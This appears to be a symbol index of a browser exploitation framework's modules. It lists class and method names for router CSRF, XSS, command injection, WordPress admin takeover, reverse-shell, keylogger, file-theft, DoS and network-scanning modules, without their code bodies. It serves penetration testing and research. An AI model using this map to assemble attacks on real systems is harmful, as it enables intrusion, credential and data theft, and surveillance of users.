class Tplink_dns_csrf (line 6) | class Tplink_dns_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/utstarcom_wa3002g4_dns_hijack/module.rb
class Utstarcom_wa3002g4_dns_hijack (line 6) | class Utstarcom_wa3002g4_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/virgin_superhub_csrf/module.rb
class Virgin_superhub_csrf (line 6) | class Virgin_superhub_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/wipg1000_cmd_injection/module.rb
class Wipg1000_cmd_injection (line 6) | class Wipg1000_cmd_injection < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/exploits/ruby_nntpd_cmd_exec/module.rb
class Ruby_nntpd_cmd_exec (line 8) | class Ruby_nntpd_cmd_exec < BeEF::Core::Command
method options (line 9) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/shell_shock_scanner/module.rb
class Shell_shock_scanner (line 6) | class Shell_shock_scanner < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 35) | def post_execute
FILE: modules/exploits/shell_shocked/module.rb
class Shell_shocked (line 6) | class Shell_shocked < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/exploits/skype_xss/module.rb
class Skype_xss (line 6) | class Skype_xss < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/exploits/spring_framework_malicious_jar/module.rb
class Spring_framework_malicious_jar (line 6) | class Spring_framework_malicious_jar < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb
class Dlink_dgs_1100_device_reset_csrf (line 6) | class Dlink_dgs_1100_device_reset_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb
class Dlink_dgs_1100_fdb_whitelist_csrf (line 6) | class Dlink_dgs_1100_fdb_whitelist_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/exploits/switch/dlink_dgs_1100_port_mirroring/module.rb
class Dlink_dgs_1100_port_mirroring_csrf (line 6) | class Dlink_dgs_1100_port_mirroring_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/switch/netgear_gs108t_csrf/module.rb
class Netgear_gs108t_csrf (line 6) | class Netgear_gs108t_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/vtiger_crm_upload_exploit/command.js
function get_ajax (line 35) | function get_ajax() {
function do_upload (line 51) | function do_upload(){
function ajax_upload (line 62) | function ajax_upload(){
function do_callfile (line 170) | function do_callfile(start, count){
function do_main (line 201) | function do_main(){
FILE: modules/exploits/vtiger_crm_upload_exploit/module.rb
class Vtiger_crm_upload_exploit (line 6) | class Vtiger_crm_upload_exploit < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 31) | def post_execute
FILE: modules/exploits/wanem_command_execution/module.rb
class Wanem_command_execution (line 9) | class Wanem_command_execution < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 22) | def post_execute
FILE: modules/exploits/wifi_pineapple_csrf/module.rb
class Wifi_pineapple_csrf (line 6) | class Wifi_pineapple_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/wordpress_add_admin/command.js
function g (line 7) | function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(nul...
function p (line 8) | function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRe...
FILE: modules/exploits/wordpress_add_admin/module.rb
class Wordpress_add_admin (line 4) | class Wordpress_add_admin < BeEF::Core::Command
method options (line 5) | def self.options
method post_execute (line 15) | def post_execute; end
FILE: modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
class Alienvault_ossim_3_1_xss (line 6) | class Alienvault_ossim_3_1_xss < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
class Cisco_collaboration_server_5_xss (line 6) | class Cisco_collaboration_server_5_xss < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/exploits/xss/serendipity_1.6_xss/module.rb
class Serendipity_1_6_xss (line 6) | class Serendipity_1_6_xss < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/xss/sqlitemanager_xss/module.rb
class Sqlitemanager_xss (line 6) | class Sqlitemanager_xss < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/exploits/zenoss_3x_command_execution/module.rb
class Zenoss_command_execution (line 9) | class Zenoss_command_execution < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 24) | def post_execute
FILE: modules/exploits/zenoss_add_user_csrf/module.rb
class Zenoss_add_user_csrf (line 6) | class Zenoss_add_user_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 30) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb
class Zeroshell_2_0rc2_admin_dynamic_token (line 6) | class Zeroshell_2_0rc2_admin_dynamic_token < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb
class Zeroshell_2_0rc2_admin_password (line 6) | class Zeroshell_2_0rc2_admin_password < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb
class Zeroshell_2_0rc2_admin_static_token (line 6) | class Zeroshell_2_0rc2_admin_static_token < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb
class Zeroshell_2_0rc2_file_disclosure (line 6) | class Zeroshell_2_0rc2_file_disclosure < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb
class Zeroshell_2_0rc2_migrate_hook (line 6) | class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
class Zeroshell_2_0rc2_reverse_shell_csrf_sop (line 6) | class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass (line 6) | class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
function ip2long (line 14) | function ip2long(IP) {
function long2ip (line 56) | function long2ip(ip) {
FILE: modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb
class Zeroshell_2_0rc2_scanner (line 6) | class Zeroshell_2_0rc2_scanner < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/host/clipboard_theft/module.rb
class Clipboard_theft (line 6) | class Clipboard_theft < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/detect_airdroid/module.rb
class Detect_airdroid (line 7) | class Detect_airdroid < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/host/detect_antivirus/module.rb
class Detect_antivirus (line 7) | class Detect_antivirus < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_coupon_printer/module.rb
class Detect_coupon_printer (line 7) | class Detect_coupon_printer < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_cups/module.rb
class Detect_cups (line 7) | class Detect_cups < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/host/detect_default_browser/module.rb
class Detect_default_browser (line 6) | class Detect_default_browser < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/detect_google_desktop/module.rb
class Detect_google_desktop (line 7) | class Detect_google_desktop < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_hp/module.rb
class Detect_hp (line 7) | class Detect_hp < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_local_drives/command.js
function detect_drive (line 15) | function detect_drive(drive) {
FILE: modules/host/detect_local_drives/module.rb
class Detect_local_drives (line 7) | class Detect_local_drives < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_protocol_handlers/module.rb
class Detect_protocol_handlers (line 9) | class Detect_protocol_handlers < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/host/detect_software/command.js
function detect_folder (line 20) | function detect_folder(path) {
FILE: modules/host/detect_software/module.rb
class Detect_software (line 7) | class Detect_software < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/detect_users/command.js
function detect_folder (line 15) | function detect_folder(path) {
FILE: modules/host/detect_users/module.rb
class Detect_users (line 7) | class Detect_users < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/host/get_battery_status/module.rb
class Get_battery_status (line 6) | class Get_battery_status < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/get_connection_type/module.rb
class Get_connection_type (line 6) | class Get_connection_type < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/get_internal_ip_java/command.js
function waituntilok (line 16) | function waituntilok() {
FILE: modules/host/get_internal_ip_java/get_internal_ip.java
class get_internal_ip (line 16) | public class get_internal_ip extends Applet {
method MyIP (line 21) | private String MyIP(boolean paramBoolean) {
method init (line 41) | public void init() {
method ip (line 45) | public String ip() {
method internalIp (line 49) | public String internalIp() {
method start (line 53) | public void start() {
FILE: modules/host/get_internal_ip_java/module.rb
class Get_internal_ip_java (line 6) | class Get_internal_ip_java < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 17) | def post_execute
FILE: modules/host/get_internal_ip_webrtc/command.js
function retResults (line 68) | function retResults(){
function processIPs (line 76) | function processIPs(newAddr) {
function grepSDP (line 86) | function grepSDP(sdp) {
FILE: modules/host/get_internal_ip_webrtc/module.rb
class Get_internal_ip_webrtc (line 6) | class Get_internal_ip_webrtc < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/get_registry_keys/command.js
function waituntilok (line 14) | function waituntilok() {
FILE: modules/host/get_registry_keys/module.rb
class Get_registry_keys (line 6) | class Get_registry_keys < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/host/get_system_info_java/command.js
function waituntilok (line 16) | function waituntilok() {
FILE: modules/host/get_system_info_java/getSystemInfo.java
class getSystemInfo (line 12) | public class getSystemInfo extends Applet {
method getSystemInfo (line 14) | public getSystemInfo() {
method getInfo (line 19) | public static String getInfo() {
FILE: modules/host/get_system_info_java/module.rb
class Get_system_info_java (line 6) | class Get_system_info_java < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 11) | def post_execute
FILE: modules/host/get_wireless_keys/module.rb
class Get_wireless_keys (line 6) | class Get_wireless_keys < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 11) | def post_execute
FILE: modules/host/get_wireless_keys/wirelessZeroConfig.java
class wirelessZeroConfig (line 17) | public class wirelessZeroConfig extends Applet{
method wirelessZeroConfig (line 20) | public wirelessZeroConfig(){
method getInfo (line 24) | public static String getInfo() {
method init (line 28) | public void init() {
method getWindows (line 39) | public static String getWindows(){
method isWindows (line 104) | public static boolean isWindows() {
FILE: modules/host/hook_default_browser/module.rb
class Hook_default_browser (line 7) | class Hook_default_browser < BeEF::Core::Command
method options (line 8) | def self.options
method pre_send (line 18) | def pre_send
method post_execute (line 46) | def post_execute
FILE: modules/host/hook_microsoft_edge/module.rb
class Hook_microsoft_edge (line 7) | class Hook_microsoft_edge < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/host/insecure_url_skype/module.rb
class Insecure_url_skype (line 6) | class Insecure_url_skype < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/host/iphone_tel/module.rb
class Iphone_tel (line 6) | class Iphone_tel < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/host/physical_location/module.rb
class Physical_location (line 6) | class Physical_location < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/host/physical_location_thirdparty/module.rb
class Physical_location_thirdparty (line 6) | class Physical_location_thirdparty < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 34) | def post_execute
FILE: modules/ipec/cross_site_faxing/module.rb
class Cross_site_faxing (line 6) | class Cross_site_faxing < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 62) | def post_execute
FILE: modules/ipec/cross_site_printing/command.js
function send_msg (line 13) | function send_msg(ip, port) {
FILE: modules/ipec/cross_site_printing/module.rb
class Cross_site_printing (line 6) | class Cross_site_printing < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 57) | def post_execute
FILE: modules/ipec/dns_tunnel/module.rb
class Dns_tunnel (line 6) | class Dns_tunnel < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/ipec/etag_client/command.js
function getHeader (line 17) | function getHeader(url, mode)
function start (line 28) | function start( origin, id )
function decode (line 34) | function decode( bin_message )
function get_data (line 47) | function get_data( origin, id )
function get_message (line 80) | function get_message( origin, id )
FILE: modules/ipec/etag_client/module.rb
class Etag_client (line 6) | class Etag_client < BeEF::Core::Command
method options (line 7) | def self.options
method pre_send (line 20) | def pre_send
method post_execute (line 32) | def post_execute
FILE: modules/ipec/inter_protocol_imap/module.rb
class Inter_protocol_imap (line 6) | class Inter_protocol_imap < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/ipec/inter_protocol_irc/module.rb
class Inter_protocol_irc (line 6) | class Inter_protocol_irc < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/ipec/inter_protocol_posix_bindshell/command.js
function send_cmds (line 23) | function send_cmds(ip, port, cmd, size) {
function waituntilok (line 62) | function waituntilok() {
FILE: modules/ipec/inter_protocol_posix_bindshell/module.rb
class Inter_protocol_posix_bindshell (line 45) | class Inter_protocol_posix_bindshell < BeEF::Core::Command
method options (line 46) | def self.options
method post_execute (line 57) | def post_execute
FILE: modules/ipec/inter_protocol_redis/module.rb
class Inter_protocol_redis (line 6) | class Inter_protocol_redis < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/ipec/inter_protocol_win_bindshell/command.old.js
function do_submit (line 22) | function do_submit(ip, port, content) {
function waituntilok (line 48) | function waituntilok() {
FILE: modules/ipec/inter_protocol_win_bindshell/module.rb
class Inter_protocol_win_bindshell (line 12) | class Inter_protocol_win_bindshell < BeEF::Core::Command
method options (line 13) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/ipec/s2c_dns_tunnel/command.js
function get_byte (line 56) | function get_byte(msg, byte) {
function getRandomStr (line 75) | function getRandomStr(n){
function get_message (line 80) | function get_message(msg) {
function reconstruct_byte (line 90) | function reconstruct_byte(msg, byte){
FILE: modules/ipec/s2c_dns_tunnel/module.rb
class S2c_dns_tunnel (line 6) | class S2c_dns_tunnel < BeEF::Core::Command
method options (line 7) | def self.options
method pre_send (line 23) | def pre_send
method post_execute (line 36) | def post_execute
FILE: modules/metasploit/browser_autopwn/module.rb
class Browser_autopwn (line 6) | class Browser_autopwn < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 25) | def post_execute
FILE: modules/misc/blockui/module.rb
class Blockui (line 6) | class Blockui < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/misc/ibm_inotes/extract_inotes_list/module.rb
class Extract_inotes_list (line 16) | class Extract_inotes_list < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 26) | def post_execute
FILE: modules/misc/ibm_inotes/inotes_flooder/module.rb
class Inotes_flooder (line 16) | class Inotes_flooder < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 27) | def post_execute
FILE: modules/misc/ibm_inotes/read_inotes/module.rb
class Read_inotes (line 16) | class Read_inotes < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 24) | def post_execute
FILE: modules/misc/ibm_inotes/send_inotes/module.rb
class Send_inotes (line 16) | class Send_inotes < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 26) | def post_execute
FILE: modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb
class Send_inotes_with_attachment (line 16) | class Send_inotes_with_attachment < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 29) | def post_execute
FILE: modules/misc/iframe_keylogger/command.js
function keyPressHandler (line 13) | function keyPressHandler(evt) {
function setKeypressHandler (line 27) | function setKeypressHandler(windowOrFrame, keyHandler) {
FILE: modules/misc/iframe_keylogger/module.rb
class Iframe_keylogger (line 6) | class Iframe_keylogger < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/misc/iframe_sniffer/leakyframe.js
function LeakyFrame (line 84) | function LeakyFrame(url, callback, debug) {
FILE: modules/misc/iframe_sniffer/module.rb
class Iframe_sniffer (line 6) | class Iframe_sniffer < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/misc/invisible_iframe/module.rb
class Invisible_iframe (line 6) | class Invisible_iframe < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/misc/local_file_theft/command.js
function identify (line 189) | function identify(){
function discoverUsers (line 214) | function discoverUsers(os){
function grabFiles (line 219) | function grabFiles(dir,os){
FILE: modules/misc/local_file_theft/module.rb
class Local_file_theft (line 10) | class Local_file_theft < BeEF::Core::Command
method options (line 11) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/misc/nosleep/module.rb
class No_sleep (line 6) | class No_sleep < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/misc/raw_javascript/module.rb
class Raw_javascript (line 6) | class Raw_javascript < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/misc/read_gmail/module.rb
class Read_gmail (line 16) | class Read_gmail < BeEF::Core::Command
method post_execute (line 21) | def post_execute
FILE: modules/misc/track_physical_movement/command.js
function setStatus (line 28) | function setStatus(new_status) {
function updateStatus (line 36) | function updateStatus() {
function mostRecentMovementOverall (line 76) | function mostRecentMovementOverall(numberOfHistoricPoints) {
function mostRecentMovement (line 83) | function mostRecentMovement(array, numberOfHistoricPoints, removeNegativ...
function motion (line 99) | function motion(event) {
function orientation (line 111) | function orientation(event) {
FILE: modules/misc/track_physical_movement/module.rb
class Track_physical_movement (line 6) | class Track_physical_movement < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 11) | def post_execute
FILE: modules/misc/unblockui/module.rb
class Unblockui (line 6) | class Unblockui < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/misc/wordpress/add_user/command.js
function check_response_for_error (line 36) | function check_response_for_error(xhr) {
function create_user (line 49) | function create_user(nonce) {
FILE: modules/misc/wordpress/add_user/module.rb
class Wordpress_add_user (line 12) | class Wordpress_add_user < WordPressCommand
method options (line 13) | def self.options
FILE: modules/misc/wordpress/current_user_info/command.js
function process_profile_page (line 25) | function process_profile_page(xhr) {
FILE: modules/misc/wordpress/current_user_info/module.rb
class Wordpress_current_user_info (line 9) | class Wordpress_current_user_info < WordPressCommand
FILE: modules/misc/wordpress/upload_rce_plugin/beefbind.php
function hide_plugin (line 26) | function hide_plugin() {
function hide_plugin_from_network (line 36) | function hide_plugin_from_network($plugins) {
FILE: modules/misc/wordpress/upload_rce_plugin/command.js
function upload_and_active_plugin (line 29) | function upload_and_active_plugin(nonce) {
FILE: modules/misc/wordpress/upload_rce_plugin/module.rb
class Wordpress_upload_rce_plugin (line 17) | class Wordpress_upload_rce_plugin < WordPressCommand
method generate_zip_payload (line 21) | def self.generate_zip_payload(auth_key)
method options (line 44) | def self.options
FILE: modules/misc/wordpress/wordpress_command.rb
class WordPressCommand (line 10) | class WordPressCommand < BeEF::Core::Command
method pre_send (line 11) | def pre_send
method options (line 16) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/misc/wordpress/wp.js
function log (line 11) | function log(data, status = null) {
function get (line 19) | function get(absolute_path, success) {
function post (line 36) | function post(absolute_path, data, success) {
function post_as_binary (line 57) | function post_as_binary(absolute_path, boundary, data, success) {
function get_nonce (line 89) | function get_nonce(absolute_path, nonce_id, success) {
FILE: modules/misc/wordpress_post_auth_rce/module.rb
class Wordpress_post_auth_rce (line 6) | class Wordpress_post_auth_rce < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/network/ADC/f5_bigip_cookie_disclosure/command.js
function f5CookieDecode (line 16) | function f5CookieDecode(cookieValue){
FILE: modules/network/ADC/f5_bigip_cookie_disclosure/module.rb
class F5_bigip_cookie_disclosure (line 6) | class F5_bigip_cookie_disclosure < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/network/ADC/f5_bigip_cookie_stealing/module.rb
class F5_bigip_cookie_stealing (line 6) | class F5_bigip_cookie_stealing < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/network/DOSer/module.rb
class Doser (line 6) | class Doser < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/network/DOSer/worker.js
function noCache (line 15) | function noCache(u){
function doRequest (line 25) | function doRequest(){
FILE: modules/network/cross_origin_scanner_cors/module.rb
class Cross_origin_scanner_cors (line 6) | class Cross_origin_scanner_cors < BeEF::Core::Command
method post_execute (line 7) | def post_execute
method options (line 28) | def self.options
FILE: modules/network/cross_origin_scanner_flash/module.rb
class Cross_origin_scanner_flash (line 6) | class Cross_origin_scanner_flash < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 12) | def post_execute
method options (line 43) | def self.options
FILE: modules/network/cross_origin_scanner_flash/swfobject.js
function f (line 4) | function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].ap...
function K (line 4) | function K(X){if(J){X()}else{U[U.length]=X}}
function s (line 4) | function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load"...
function h (line 4) | function h(){if(T){V()}else{H()}}
function V (line 4) | function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setA...
function H (line 4) | function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[a...
function z (line 4) | function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typ...
function A (line 4) | function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}
function P (line 4) | function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X...
function p (line 4) | function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNo...
function g (line 4) | function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML...
function u (line 4) | function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(...
function e (line 4) | function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttr...
function y (line 4) | function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.s...
function b (line 4) | function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function...
function c (line 4) | function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}
function C (line 4) | function C(X){return j.createElement(X)}
function i (line 4) | function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}
function F (line 4) | function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=pars...
function v (line 4) | function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagN...
function w (line 4) | function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z...
function L (line 4) | function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof...
FILE: modules/network/detect_burp/module.rb
class Detect_burp (line 6) | class Detect_burp < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/network/detect_ethereum_ens/module.rb
class Detect_ethereum_ens (line 6) | class Detect_ethereum_ens < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/network/detect_opennic/module.rb
class Detect_opennic (line 6) | class Detect_opennic < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/network/detect_soc_nets/module.rb
class Detect_soc_nets (line 6) | class Detect_soc_nets < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/network/detect_tor/module.rb
class Detect_tor (line 6) | class Detect_tor < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/network/dns_enumeration/command.js
function notify (line 23) | function notify() {
function check_next (line 28) | function check_next() {
function do_resolv (line 34) | function do_resolv(url) {
FILE: modules/network/dns_enumeration/module.rb
class Dns_enumeration (line 9) | class Dns_enumeration < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/network/dns_rebinding/command.js
function get_next_query (line 16) | function get_next_query() {
function resolv_query (line 24) | function resolv_query() {
FILE: modules/network/dns_rebinding/module.rb
class Dns_rebinding (line 6) | class Dns_rebinding < BeEF::Core::Command
method options (line 7) | def self.options
method pre_send (line 25) | def pre_send
FILE: modules/network/fetch_port_scanner/command.js
function prepare_ports (line 20) | function prepare_ports() {
function check_blocked (line 51) | function check_blocked(port_to_check) {
function fetch_scan (line 62) | function fetch_scan(hostname, port_) {
function sleep (line 144) | function sleep(ms) {
function run (line 150) | async function run() {
FILE: modules/network/fetch_port_scanner/module.rb
class Fetch_port_scanner (line 6) | class Fetch_port_scanner < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/network/get_http_servers/module.rb
class Get_http_servers (line 7) | class Get_http_servers < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/network/get_ntop_network_hosts/module.rb
class Get_ntop_network_hosts (line 6) | class Get_ntop_network_hosts < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/network/get_proxy_servers_wpad/module.rb
class Get_proxy_servers_wpad (line 6) | class Get_proxy_servers_wpad < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/network/identify_lan_subnets/module.rb
class Identify_lan_subnets (line 10) | class Identify_lan_subnets < BeEF::Core::Command
method options (line 11) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/network/internal_network_fingerprinting/module.rb
class Internal_network_fingerprinting (line 7) | class Internal_network_fingerprinting < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/network/jslanscanner/module.rb
class Fingerprint_routers (line 7) | class Fingerprint_routers < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 12) | def post_execute
FILE: modules/network/nat_pinning_irc/command.js
function dot2dec (line 12) | function dot2dec(dot){
FILE: modules/network/nat_pinning_irc/module.rb
class Irc_nat_pinning (line 6) | class Irc_nat_pinning < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 22) | def post_execute
FILE: modules/network/ping_sweep/module.rb
class Ping_sweep (line 6) | class Ping_sweep < BeEF::Core::Command
method post_execute (line 7) | def post_execute
method options (line 27) | def self.options
FILE: modules/network/ping_sweep_ff/command.js
function do_scan (line 37) | function do_scan(host, timeout) {
FILE: modules/network/ping_sweep_ff/module.rb
class Ping_sweep_ff (line 11) | class Ping_sweep_ff < BeEF::Core::Command
method options (line 12) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/network/ping_sweep_java/command.js
function waituntilok (line 20) | function waituntilok() {
FILE: modules/network/ping_sweep_java/module.rb
class Ping_sweep_java (line 11) | class Ping_sweep_java < BeEF::Core::Command
method pre_send (line 12) | def pre_send
method options (line 16) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/network/ping_sweep_java/pingSweep.java
class pingSweep (line 18) | public class pingSweep extends Applet {
method pingSweep (line 24) | public pingSweep() {
method init (line 29) | public void init(){
method getHostsNumber (line 35) | public static int getHostsNumber(){
method getAliveHosts (line 45) | public static String getAliveHosts(){
method parseIpRange (line 55) | private static List<InetAddress> parseIpRange(String ipRange) throws U...
method checkHosts (line 74) | private static String checkHosts(List<InetAddress> inetAddresses) thro...
